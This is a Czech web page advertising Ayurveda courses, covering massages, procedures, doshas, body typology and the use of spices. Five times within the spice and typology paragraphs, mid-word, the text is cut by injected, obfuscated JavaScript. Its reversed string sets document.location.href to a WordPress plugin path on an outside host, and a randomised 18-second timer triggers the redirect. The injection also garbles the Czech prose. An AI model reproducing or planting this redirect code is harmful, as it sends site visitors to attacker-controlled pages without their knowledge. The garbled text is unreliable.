Kurzy

Výuka ájurvedských masáží a procedur:

  • Antistresová masáž obličeje a hlavy
  • Sarvang masáž
  • Dátá Snéhan masáž
  • Basti procedura
  • Procedura kovovými miskami
  • Nadí svédan procedura
  • Pinda svédan procedura

Výuka základů ájurvédy:

  • Principy ájurvédy
  • Pančmahabhůt
  • Tridóš
  • Triguny

Výuka ájurvédské kuchyně:

Typologie člověka

Tělo potřebuje výživu, která se vytváří z jídla. Protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to by jídlo mělo obsahovat výživné látky pro všech sedm druhů tkání. Pokud se díváme jen povrchově, má každý člověk skoro stejné tělo. Budeme-li pozorovat detaily, rozeznáme odlišnosti a pochopíme, že pro někoho může být podaná potravina lék a pro jiného jed. V ájurvédě se těla poznávají podle stavu pančmahabhůt. Povaha a trvalá vlastnost člověka záleží na dominantní mahabhůt v těle.

Základní znalosti o koření

Koření je obecně používáno hlavně pro zvláštní chuť a aroma, které dodává jídlu, s nimž je kombinováno. Usnadňuje trávení a působí antisepticky proti nežádoucí mikroflóře. Koření působí jako lék, a protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to se musí používat nejen podle chuti, ale i podle jeho vlastností a potřeby těla. Například chilli není třeba používat v chladném pásmu, protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tože probouzí pocit žízně. V mírném pásmu, pokud je několik dní horko, je chilli užitečné, jelikož vzbudí chuť na čistoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tou vodu. Extrémní používání zázvoru v teplém období může u člověka zvýšit pitt, což bude příčinou krvácení z nosu. V zimním období udržuje oheň v těle a celkově pomáhá pří zvýšené kaf. Podobně by se daly rozebrat další druhy koření. Tatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to snadná logika je dostačující, aby si člověk mohl vybrat ve správný okamžik správné koření.

Ukázka základních ajurvédských pokrmů

Sabdží, rajta, čapátí, purí, čonk- klíčový recept v indické kuchyni.